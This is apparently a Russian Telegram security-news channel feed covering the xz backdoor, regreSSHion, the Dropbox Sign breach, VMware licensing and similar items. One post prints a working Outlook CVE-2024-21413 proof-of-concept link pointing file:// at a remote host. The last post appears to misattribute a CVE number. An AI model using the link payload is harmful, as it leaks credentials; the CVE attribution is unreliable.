Информационная опасность
1.14K subscribers
187 photos
20 videos
7 files
93 links
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Извлечение ключей BitLocker из доверенного платформенного модуля на примере Lenovo X1 Carbon менее чем за минуту.
👍2😢1
Nginx от Рамблера дедушки ушел, потом от F5 бабушки ушел...

https://mailman.nginx.org/pipermail/nginx-devel/2024-February/K5IC6VYO2PB7N4HRP2FUQIBIBCGP4WAU.html
12 февраля 2024 года компания Broadcom, владеющая VMware, прекратила распространение бесплатных версий VMware vSphere Hypervisor ESXi 7.x и 8.x. Всё.

https://kb.vmware.com/s/article/2107518

Бесплатных продуктов от VMware теперь нет.

Давно пора тем кто еще не - переезжать на Proxmox.
👍1
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413 . Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019.

Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.

Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.

<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>

PoC
Такие дела.

Купил в магазине маленький вибратор. На нем есть колпачок, который снимается и появляется USB-порт для зарядки. Получается флешка с вибратором.

Без раздумий подключил его к компьютеру для зарядки.

Открыл веб-браузер, и тут же загрузился файл. Не открывая никаких веб-страниц, 🛡malwarebytes отметил его как вредоносное ПО и остановил загрузку.

https://www.reddit.com/r/Malware/comments/1asn02v/malware_from_a_vibrator/
🔌Когда мы подключаемся к VPN, нужно понимать, что передаем всю информацию на устройстве тем, кто этот трафик обеспечивает. В эфире МК объяснил суть запрета на распространение информации о способах и методах обхода блокировок, который вступил в силу сегодня, 1 марта.
В Красном море перебиты четыре подводных телекоммуникационных кабеля из полутора десятков, соединяющих Европу, Азию и Африку; речь идет о линиях связи Asia–Africa–Europe 1 (AAE–1), Europe India Gateway, Seacom и TGN, на которые приходится 25 % трафика в регионе; пострадавшие маршруты являются важнейшими для передачи данных из Азии в Европу — HGC Global Communications Limited.
Backdoor в xz/liblzma (атака на цепочку поставок)

Ну и кто добавил вредонос ?
*
А ноги растут из 2021 года, когда был создан акк JiaT75 на гите.
JiaT75 делает коммит, заменяя Safe_fprint небезопасным вариантом, делая еще одну потенциальную дырку.
*
В 2022 году добавляет патч к xz и появляется еще один коммитер Jigar Kumar.
Вместе они парят голову Лассе Колину (разраб xz) и патч мерджится.
Ребятам стали доверять и выдали креды к репозиторию.
*
В 2023 контактная почта в Google oss-fuzz меняется на JiaT75, а не на Лассе Коллина.
И коммиты понеслись....
*
В 2024 году ребята меняю URL tukaani.org/xz/ на xz.tukaani.org/xz-utils/ который далее уводит на гит JiaT75. Отжали проект. Далее добавляются последнии коммиты уже с бэкдором и шлюхами
Как был взломан Dropbox Sign

Злоумышленники взломали учетную запись службы в бэкенде Sign, у которой были привилегии для выполнения различных действий в продакшн среде. Затем они использовали этот доступ для получения доступа к базе данных клиентов.

В ходе расследования выяснилось, что злоумышленники получили доступ к данным, включая информацию о клиентах: электронную почту, имена пользователей, номера телефонов и хэшированные пароли.

Кроме того, были скомпрометированы конфигурации, информация о настройках, и информация об аутентификации, например, API-ключи, OAuth-токены и данные о многофакторной аутентификации пользователей.

Dropbox Sign взломали и слили всю базу, включая секреты для TOTP. Sign — это сервис, через через который можно шарить и подписывать документы онлайн.
🔤🔤🔤🔤🔤🔤🔤🔤🔤🔤

Countries ranked by their World Cybercrime Index (WCI).

Данные, лежащие в основе индекса, были собраны в ходе опроса 92 ведущих экспертов по киберпреступности со всего мира, которые участвуют в сборе и расследованиях кибер-преступности. В ходе опроса эксперты рассмотрели пять основных категорий * киберпреступности, выдвинули страны, которые они считают наиболее значимыми источниками каждого из этих видов киберпреступности, а затем ранжировали каждую страну по влиянию, профессионализму, техническим навыкам ее киберпреступников.
Please open Telegram to view this post
VIEW IN TELEGRAM
Методика_оценки_показателя_состояния_ЗИ_и_безопасности_КИИ.pdf
178.2 KB
📣 Методика оценки показателя состояния защиты информации и обеспечения безопасности объектов КИИ
Please open Telegram to view this post
VIEW IN TELEGRAM
😈Хакер под псевдонимом «Cvsp» на одном киберпреступных форумов заявил о продаже RCE-эксплойта для zero-day уязвимости в Microsoft Outlook.

По данным хакера, данный эксплойт позволяет удалённое выполнение кода и гарантированно работает на Microsoft Office 2016, 2019, LTSC 2021 и Microsoft 365 Apps for Enterprise.

Проведённые тесты якобы показали 100% успеха, что свидетельствует о высокой надёжности и эффективности эксплойта в компрометации уязвимых систем.

Если это не скам, то цена вполне оправдана, учитывая количество потенциальных жертв.
Please open Telegram to view this post
VIEW IN TELEGRAM
2
От такие дела, малята )
An Unauthenticated Remote Code Execution (RCE) vulnerability in OpenSSH’s server (sshd) on glibc-based Linux systems.

Компания Qualys выявила критическую уязвимость (CVE-2024-6387) в OpenSSH, позволяющую добиться удалённого выполнения кода с правами root без прохождения аутентификации. Уязвимость, которая получила кодовое имя regreSSHion, проявляется в конфигурации по умолчанию начиная с версии OpenSSH 8.5 на системах со стандартной библиотекой Glibc.
🔥1
🔤2️⃣4️⃣🔤🔤🔤🔤🔤

Сумма всего, что Crowdstrike могла предотвратить, вероятно, меньше, чем ущерб, который они только что нанесли.
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-21683 0-click RCE

Затронуты версии от Win server 2000 до Win server 2025

Уязвимость в службе лицензирования удаленных рабочих столов Windows (RDL), в инет сейчас торчит 170 000 таких хостов.